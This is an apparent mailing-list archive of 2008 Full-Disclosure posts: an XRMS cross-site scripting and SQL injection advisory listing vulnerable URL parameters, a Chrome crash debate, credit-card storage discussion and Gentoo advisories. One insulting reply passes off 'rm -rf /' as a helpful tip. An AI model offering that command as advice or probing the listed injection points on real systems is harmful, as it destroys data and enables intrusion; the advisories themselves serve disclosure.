JavaScript with: http://localhost/xrms/login.php?target="> http://localhost/xrms/activities/some.php?title="> http://localhost/xrms/companies/some.php?company_name="> http://localhost/xrms/contacts/some.php?last_name="> http://localhost/xrms/campaigns/some.php?campaign_title="> http://localhost/xrms/opportunities/some.php?opportunity_title="> http://localhost/xrms/cases/some.php?case_title="> http://localhost/xrms/files/some.php?file_id="> http://localhost/xrms/reports/custom/mileage.php?starting="> ... A user could change their real name to ; will be executed when the administrator looks at user list A user could edit name/email of any user using SQL injection vulnerbility in admin/users/self-2.php Disclosure Timeline 2008-08-07 Vendor contacted 2008-09-04 Advisory published CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-XXXX to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck). This vulnerability relate to CVE-2008-1129 It's licensed under the creative commons attribution license. Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de -- _GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85 _chaos events near stuttgart_ www.datensalat.eu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/9496d052/attachment.bin From shyaam at gmail.com Thu Sep 4 01:04:34 2008 From: shyaam at gmail.com (Shyaam) Date: Wed, 3 Sep 2008 20:04:34 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080903203947.5E15C11803C@smtp.hushmail.com> References: <20080903203947.5E15C11803C@smtp.hushmail.com> Message-ID: > This is an out of bounds memory read that crashes the browser. It > is a major exaggeration to call this a vulnerability, especially > considering this is a beta browser. Not that others haven't already > said it, but people never seem to learn that a browser crash is a > stability issue, not a security issue. > This is a healthy discussion. This topic leads to a very good question. When do we call a bug as a vulnerability and when does an issue really turn out to be a security issue. When we have memory index out of bound error or when we have a OS level code having a out of bound memory error or when we reference an index value that doesn't exist or in many other cases, we do reference it as a vulnerability. So, in such cases where simple bugs and vulnerabilities overlap, is it not good to call it a vulnerability and correct it rather than downgrading from what it should be. I am not saying anything pertaining to this situation or redb0ne's email. It is a really good topic to discuss about. Like what redb0ne has mentioned, we always have 2 subsets. Common bugs that are not security related and something that is a security issue. And the overlap in these two would be bugs that leads to vulnerabilities. Let me know if I am missing something or if you guys know some materials where I can learn such missing gaps. My sincere apologies if this email sounded stupid. Shyaam > > > > -----BEGIN PGP SIGNATURE----- > Note: This signature can be verified at https://www.hushtools.com/verify > Charset: UTF8 > Version: Hush 3.0 > > wpwEAQMCAAYFAki+9g8ACgkQGwcl4JwqQeBgBgP/YGeDE2VtxDaxw4S81LadJc0GbCJo > BmkN5g+6VhimPxUwvLgGyYoyaJg+Ab/cPzDELLMfp6h9jV+14jLO+2NYMnM8/G236Xjd > sew1u81YXnKUjaDkX0clUT9K9sWkQ2kJwnH6ZbMncnSpTXBLISiXyhoDCvtrdeTI1y8t > 9a2kAMc= > =ysci > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/9455530d/attachment.html From redb0ne at hush.com Thu Sep 4 03:50:36 2008 From: redb0ne at hush.com (redb0ne at hush.com) Date: Wed, 03 Sep 2008 22:50:36 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080904025037.B379415803E@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 My judgment is telling me to just ignore this, but I'll entertain it with one response. On Wed, 03 Sep 2008 20:04:34 -0400 Shyaam wrote: >This is a healthy discussion. This topic leads to a very good >question. When >do we call a bug as a vulnerability and when does an issue really >turn out >to be a security issue. When we have memory index out of bound >error or when >we have a OS level code having a out of bound memory error or when >we >reference an index value that doesn't exist or in many other >cases, we do >reference it as a vulnerability. Out of bound array accesses can be vulnerabilities because they can in some cases result in code execution, but not in this case. In this case, it is just an integer underflow that causes a conditional to evaluate to true that shouldn't have and a byte or two of memory being read out of bounds. There is no write, the memory can't be leaked by an attacker, it is simply a crash. You can't even begin to compare a kernel denial of service to a browser crash, killing a browser is a world away from taking down an entire system. Let's face it, the last thing we need is someone whoring out attention for every browser crash they come across. Report it and be done with it, no one cares. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAki/TP0ACgkQGwcl4JwqQeBmIwP+Lx9ie5O6Pg8NsX4oJOnMlbh7AfWe 05CxdoLEkocqs583yuuaDbxokZU8g4dyB+eNYDl0Y2+xT/rJJSQtXRAsVLJ/NJcdUtiA 9xxLWbZMNkUnVXlnggsYBm3rYvS6BRNezy06+SEChczEz5h8sP5AZYeQJuYsCXBG1uYD bzG+j0A= =P0V0 -----END PGP SIGNATURE----- From shyaam at gmail.com Thu Sep 4 04:20:44 2008 From: shyaam at gmail.com (Shyaam) Date: Thu, 4 Sep 2008 03:20:44 +0000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: References: <20080904025037.B379415803E@smtp.hushmail.com> Message-ID: > > Out of bound array accesses can be vulnerabilities because they can >> in some cases result in code execution, but not in this case. In >> this case, it is just an integer underflow that causes a >> conditional to evaluate to true that shouldn't have and a byte or >> two of memory being read out of bounds. There is no write, the >> memory can't be leaked by an attacker, it is simply a crash. >> >> You can't even begin to compare a kernel denial of service to a >> browser crash, killing a browser is a world away from taking down >> an entire system. Let's face it, the last thing we need is someone >> whoring out attention for every browser crash they come across. >> Report it and be done with it, no one cares. > > Cool!!! Thanks... Shyaam -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/a85bd82e/attachment.html From shaun at shaunc.com Thu Sep 4 06:47:03 2008 From: shaun at shaunc.com (Shaun) Date: Thu, 04 Sep 2008 00:47:03 -0500 Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> Message-ID: <20080904002313.F473.5922242B@shaunc.com> On Wed, 3 Sep 2008 16:31:25 +0700 "Samuel Beckett" wrote: > What would be the the worst case if you implement the following scenario for > a credit card transaction: [..snip..] > After the successful credit card transaction, certain credit card details > are then encrypted and stored within the database. There is your worst case. Game over. You process my transaction, you are done with my certain credit card details the moment you get an auth or nack from your gateway. You as a vendor should never see my credit card number to start with. You should be passing my transaction to an originating bank. Alas, we know this rarely happens. So I grant the fact that you, the vendor, see (even if only briefly) my credit card number. If you're hanging onto that in an "encrypted" format, either you're doing so because you can also decrypt it later - in which case, anyone else who gets ahold of your database can also decrypt it later - or you're doing it for no reason at all. Both of these are bogus justifications. Yes, it's handy to be able to login to your site 6 months from now and buy something else without re-entering my credit card. No, as far as I'm concerned, it's not worth saving 16 keystrokes for you to keep my shit on file and have it go walking off on someone's laptop 2 years after I did a single transaction with your business. If I give you my credit card number, it is for one single transaction in the here and now. If you want to store my credit card number, you do it at the risk of showing up in the media in a few months, ala TJX, as some bunch of incompetent assholes who couldn't keep my shit safe. Come to think of it, that happens just about every week and there never seem to be any consequences, at least not here in the USA. Maybe we should go into business together. -s /old school idiot From juha-matti.laurio at netti.fi Thu Sep 4 11:47:01 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Thu, 4 Sep 2008 13:47:01 +0300 (EEST) Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 Message-ID: <20083468.743031220525222324.JavaMail.juha-matti.laurio@netti.fi> The CVE identifier '3664' was not updated to your CVE Information section yet :) Juha-Matti Fabian Fingerle [fabian at datensalat.eu] wrote: > >Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 > --clip-- >CVE Information > >The Common Vulnerabilities and Exposures (CVE) project has assigned the >name CVE-2008-XXXX to this issue. This is a candidate for inclusion in >the CVE list (http://cve.mitre.org/), which standardizes names for >security problems. > From juha-matti.laurio at netti.fi Thu Sep 4 12:46:12 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Thu, 4 Sep 2008 14:46:12 +0300 (EEST) Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> FYI: This was assigned to BID30983: http://www.securityfocus.com/bid/30983 Juha-Matti Rishi Narang [psy.echo at gmail.com] wrote: > Hi, > > "Time" can definitely plays a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs. > > Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with the some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) couple of hours before I released it out at EvilFingers. > > So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same. > > -- > Thanks & Regards, > Rishi Narang | Security Researcher > Founder, GREYHAT Insight > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > www.greyhat.in > > .. eschew obfuscation, espouse elucidation. > > Wednesday, September 3, 2008, 5:43:40 AM, you wrote: > > > -----Original Message----- > > From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > > Narang > > Sent: Tuesday, September 02, 2008 7:51 PM > > To: full-disclosure at lists.grok.org.uk > > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > > > Hi, > > > --------------------------------------------------- > > Software: > > Google Chrome Browser 0.2.149.27 > > > Tested: > > Windows XP Professional SP3 > > > Result: > > Google Chrome Crashes with All Tabs > > > Problem: > > An issue exists in how chrome behaves with undefined-handlers in > > chrome.dll version 0.2.149.27. A crash can result without user > > interaction. When a user is made to visit a malicious link, which has an > > undefined handler followed by a 'special' character, the chrome crashes > > with a Google Chrome message window "Whoa! Google Chrome has crashed. > > Restart now?". It fails in dealing with the POP EBP instruction when > > pointed out by the EIP register at 0x01002FF4. > > > Proof of Concept: > > http://evilfingers.com/advisory/google_chrome_poc.php > > > Credit: > > Rishi Narang (psy.echo) > > www.greyhat.in > > www.evilfingers.com > > --------------------------------------------------- From thouth at gmail.com Thu Sep 4 13:32:57 2008 From: thouth at gmail.com (Fionnbharr) Date: Thu, 4 Sep 2008 22:32:57 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> dear god people, I've got null ptr derefs in firefox but I don't make full disclosure posts about them. I care about them nearly as much as vulnz in a browser no one uses for more than 5 minutes. Get the fuck off my list. 2008/9/4 Juha-Matti Laurio : > FYI: > This was assigned to BID30983: > http://www.securityfocus.com/bid/30983 > > Juha-Matti > > Rishi Narang [psy.echo at gmail.com] wrote: >> Hi, >> >> "Time" can definitely plays a major role. There was a collision that occurred due to the fact that I took time to find the real break point in the code, search for a template and to publish at EvilFingers site before sending it to Google and other bugtraqs. >> >> Even though I had the vulnerability 4 hrs well before the real publication of the bug and had the exploit along with the some crash details like "int 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions of http/ftp and further debug logs; there was this bug published (though without the details of possible cases, exceptions and mouse hover techniques) couple of hours before I released it out at EvilFingers. >> >> So, I would like to convey due credit to Mr. JanDeMooij as well for his posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, and thanks to Mr. Brennan for contacting me about the same. >> >> -- >> Thanks & Regards, >> Rishi Narang | Security Researcher >> Founder, GREYHAT Insight >> Key: 0x8D67A3A3 (www.greyhat.in/key.asc) >> www.greyhat.in >> >> .. eschew obfuscation, espouse elucidation. >> >> Wednesday, September 3, 2008, 5:43:40 AM, you wrote: >> >> > -----Original Message----- >> > From: full-disclosure-bounces at lists.grok.org.uk >> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi >> > Narang >> > Sent: Tuesday, September 02, 2008 7:51 PM >> > To: full-disclosure at lists.grok.org.uk >> > Subject: [Full-disclosure] Google Chrome Browser Vulnerability >> >> > Hi, >> >> > --------------------------------------------------- >> > Software: >> > Google Chrome Browser 0.2.149.27 >> >> > Tested: >> > Windows XP Professional SP3 >> >> > Result: >> > Google Chrome Crashes with All Tabs >> >> > Problem: >> > An issue exists in how chrome behaves with undefined-handlers in >> > chrome.dll version 0.2.149.27. A crash can result without user >> > interaction. When a user is made to visit a malicious link, which has an >> > undefined handler followed by a 'special' character, the chrome crashes >> > with a Google Chrome message window "Whoa! Google Chrome has crashed. >> > Restart now?". It fails in dealing with the POP EBP instruction when >> > pointed out by the EIP register at 0x01002FF4. >> >> > Proof of Concept: >> > http://evilfingers.com/advisory/google_chrome_poc.php >> >> > Credit: >> > Rishi Narang (psy.echo) >> > www.greyhat.in >> > www.evilfingers.com >> > --------------------------------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From hanno at hboeck.de Thu Sep 4 15:03:25 2008 From: hanno at hboeck.de (Hanno =?utf-8?q?B=C3=B6ck?=) Date: Thu, 4 Sep 2008 16:03:25 +0200 Subject: [Full-disclosure] clamav: Crash with crafted chm, CVE-2008-1389 Message-ID: <200809041603.26318.hanno@hboeck.de> clamav: Crash with crafted chm, CVE-2008-1389 References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389 http://int21.de/cve/CVE-2008-1389-clamav-chd.html http://www.int21.de/cve/cve-2008-1389-samples.tar.bz2 https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1089 Description A fuzzing test showed weakness in the chm parser of clamav, which can possibly be exploited. The clamav team has disabled the chm module in older versions though freshclam updates and has released 0.94 with a fixed parser. The clamav team has not mentioned this issue in the release notes of 0.94, which is very bad security behaviour. Disclosure Timeline 2008-07-09: clamav bug opened unknown date: clamav disables chm-parser through freshclam 2008-09-02 Vendor releases 0.94 2008-09-04 Released this advisory CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-1389 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed under the creative commons attribution license. Hanno Boeck, 2008-09-04, http://www.hboeck.de -- Hanno B?ck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail: hanno at hboeck.de -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/4c919cb5/attachment.bin From eballen1 at qwest.net Thu Sep 4 18:21:13 2008 From: eballen1 at qwest.net (Bruce Ediger) Date: Thu, 4 Sep 2008 11:21:13 -0600 (MDT) Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: <20080904002313.F473.5922242B@shaunc.com> References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com> Message-ID: > On Wed, 3 Sep 2008 16:31:25 +0700 > "Samuel Beckett" wrote: >> After the successful credit card transaction, certain credit card details >> are then encrypted and stored within the database. And then, on Thu, 4 Sep 2008, Shaun wrote: > There is your worst case. Game over. Agreed. Keeping card number/CVV2 (or CID, or CVC, whatever you call it)/ expiration date constitutes a real problem. > You process my transaction, you are done with my certain credit card > details the moment you get an auth or nack from your gateway. You as a > vendor should never see my credit card number to start with. You should > be passing my transaction to an originating bank. Alas, we know this > rarely happens. I believe it almost never happens. As I understand the card association rules, the merchant has to hang on to the data for refund purposes. I will grant you that Chase/Paymentech will do arbitrary refunds, but I don't think that's the case for other payment processors (the "gateway" you mention above). In fact, I believe BillMatrix will only refund a previously authorized and settled payment. The merchant has to have all the right data, otherwise BillMatrix will reject the refund. A few years ago I worked on a corporate credit-card processing system, and I pushed for keeping a cryptographic hash of the credit card number, but not the number itself. That would have eliminated the need to encrypt card numbers, and any basis for accusing a programer of stealing card numbers. Alas, between card association rules, and the anti-fraud group wanting the exact card number, my idea got discarded. Since we're on the topic of credit cards, why don't we hear more about refund fraud? As near as I can tell, that's the part of the system that an insider could abuse the hell out of. Most corporations have some kind of internal accounting, so that making fake or fraudulent payments really can only happen for a few dollars, and then only for a month, or whatever the accounting period happens to be. But refunds, that's another story. As of 2 years ago, Paymentech would do arbitrary refunds: they didn't care if a corresponding payment had ever gotten authorized and settled. And corporations leave the decision about refunds up to customer service reps in a lot of cases. At the very least, there's little to no accounting for the refunds. A place ripe for a huge fraud to take place, if you ask me. From hannibal at switched.com Thu Sep 4 20:06:58 2008 From: hannibal at switched.com (hannibal) Date: Thu, 04 Sep 2008 20:06:58 +0100 Subject: [Full-disclosure] Monthly Hands-On Meetups In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> Message-ID: <48C031D2.4000605@switched.com> Professor Micheal Chatner wrote: > Hey Guys, > Hey Guy > I was wondering if anyone would like to start something like a > Full-Disclosure monthly group in cities all over the world. Fascinating idea - we could even have 'Full-Disclosure conferences', where you could get 'Full-Disclosure' Islamic prayer mats, mugs and stickers! It would a methodology centric to 'hack the planet'. > It could be like 2600 meetings except with real security professionals because > personally I don't want to even talk to someone unless they have a CEH > cert. > What's a CEH? And what leads you to assume that there are 'real security professionals' on Full-Disclosure? I think your desires may be better fed on irc.efnet.org #teenchat; As far as I know, there are more sec professionals there than FD and 2600 put together. > I just started a new job in digital forensics. Congratulations > It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks! > To conclude, Professor Michael Chatner, I'm very impressed with your desire to 'hack and trade' Ubuntu 'tips and tricks', here's a very useful one for when you feel under the weather, ashamed of your true homosexual status, or incapable of understanding how the linux 2.4 kern caches directories in kernel memory: * rm -rf /** > Let me know what you think! > Professor Micheal Chatner, M.D., CISSP I think you're a talentless moron. ~ hannibal (append your fancy degrees/certs and publishings here) From rbu at gentoo.org Thu Sep 4 20:09:04 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Thu, 4 Sep 2008 21:09:04 +0200 Subject: [Full-disclosure] [ GLSA 200809-01 ] yelp: User-assisted execution of arbitrary code Message-ID: <200809042109.25311.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: yelp: User-assisted execution of arbitrary code Date: September 04, 2008 Bugs: #234079 ID: 200809-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in yelp can lead to the execution of arbitrary code when opening a URI, for example through Firefox. Background ========== yelp is the default help browser for GNOME. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 gnome-extra/yelp < 2.22.1-r2 >= 2.22.1-r2 *>= 2.20.0-r1 Description =========== Aaron Grattafiori reported a format string vulnerability in the window_error() function in yelp-window.c. Impact ====== A remote attacker can entice a user to open specially crafted "man:" or "ghelp:" URIs in yelp, or an application using yelp such as Firefox or Evolution, and execute arbitrary code with the privileges of that user. Workaround ========== There is no known workaround at this time. Resolution ========== All yelp users running GNOME 2.22 should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-extra/yelp-2.22.1-r2" All yelp users running GNOME 2.20 should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-extra/yelp-2.20.0-r1" References ========== [ 1 ] CVE-2008-3533 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3533 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/a1066a4c/attachment.bin From rbu at gentoo.org Thu Sep 4 20:28:23 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Thu, 4 Sep 2008 21:28:23 +0200 Subject: [Full-disclosure] [ GLSA 200809-02 ] dnsmasq: Denial of Service and DNS spoofing Message-ID: <200809042128.36310.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: dnsmasq: Denial of Service and DNS spoofing Date: September 04, 2008 Bugs: #231282, #232523 ID: 200809-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Two vulnerabilities in dnsmasq might allow for a Denial of Service or spoofing of DNS replies. Background ========== Dnsmasq is a lightweight and easily-configurable DNS forwarder and DHCP server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-dns/dnsmasq < 2.45 >= 2.45 Description =========== * Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP source ports when forwarding DNS queries to a recursing DNS server (CVE-2008-1447). * Carlos Carvalho reported that dnsmasq in the 2.43 version does not properly handle clients sending inform or renewal queries for unknown DHCP leases, leading to a crash (CVE-2008-3350). Impact ====== A remote attacker could send spoofed DNS response traffic to dnsmasq, possibly involving generating queries via multiple vectors, and spoof DNS replies, which could e.g. lead to the redirection of web or mail traffic to malicious sites. Furthermore, an attacker could generate invalid DHCP traffic and cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All dnsmasq users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.45" References ========== [ 1 ] CVE-2008-3350 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3350 [ 2 ] CVE-2008-1447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/ba5fdbe9/attachment.bin From rbu at gentoo.org Thu Sep 4 20:52:03 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Thu, 4 Sep 2008 21:52:03 +0200 Subject: [Full-disclosure] [ GLSA 200809-03 ] RealPlayer: Buffer overflow Message-ID: <200809042152.10171.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: RealPlayer: Buffer overflow Date: September 04, 2008 Bugs: #232997 ID: 200809-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== RealPlayer is vulnerable to a buffer overflow allowing for the execution of arbitrary code. Background ========== RealPlayer is a multimedia player capable of handling multiple multimedia file formats. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/realplayer < 11.0.0.4028-r1 >= 11.0.0.4028-r1 Description =========== Dyon Balding of Secunia Research reported an unspecified heap-based buffer overflow in the Shockwave Flash (SWF) frame handling. Impact ====== By enticing a user to open a specially crafted SWF (Shockwave Flash) file, a remote attacker could be able to execute arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All RealPlayer users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/realplayer-11.0.0.4028-r1" References ========== [ 1 ] CVE-2007-5400 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5400 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/d60ed93e/attachment.bin From rbu at gentoo.org Thu Sep 4 20:52:52 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Thu, 4 Sep 2008 21:52:52 +0200 Subject: [Full-disclosure] [ GLSA 200809-04 ] MySQL: Privilege bypass Message-ID: <200809042152.55763.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: MySQL: Privilege bypass Date: September 04, 2008 Bugs: #220399 ID: 200809-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in MySQL might allow users to bypass privileges and gain access to other databases. Background ========== MySQL is a popular multi-threaded, multi-user SQL server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-db/mysql < 5.0.60-r1 >= 5.0.60-r1 Description =========== Sergei Golubchik reported that MySQL imposes no restrictions on the specification of "DATA DIRECTORY" or "INDEX DIRECTORY" in SQL "CREATE TABLE" statements. Impact ====== An authenticated remote attacker could create MyISAM tables, specifying DATA or INDEX directories that contain future table files by other database users, or existing table files in the MySQL data directory, gaining access to those tables. Workaround ========== There is no known workaround at this time. Resolution ========== All MySQL users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/mysql-5.0.60-r1" References ========== [ 1 ] CVE-2008-2079 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/e7de0618/attachment.bin From mailinglist at brainiacghost.co.uk Thu Sep 4 17:46:33 2008 From: mailinglist at brainiacghost.co.uk (Chris Pritchard) Date: Thu, 4 Sep 2008 17:46:33 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> Message-ID: I don't think it's "your" list, and even if it was, you didn't have to be so rude about it -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fionnbharr Sent: 04 September 2008 13:33 To: Juha-Matti Laurio Cc: full-disclosure at lists.grok.org.uk; evil fingers Subject: Re: [Full-disclosure] Google Chrome Browser Vulnerability dear god people, I've got null ptr derefs in firefox but I don't make full disclosure posts about them. I care about them nearly as much as vulnz in a browser no one uses for more than 5 minutes. Get the fuck off my list. 2008/9/4 Juha-Matti Laurio : > FYI: > This was assigned to BID30983: > 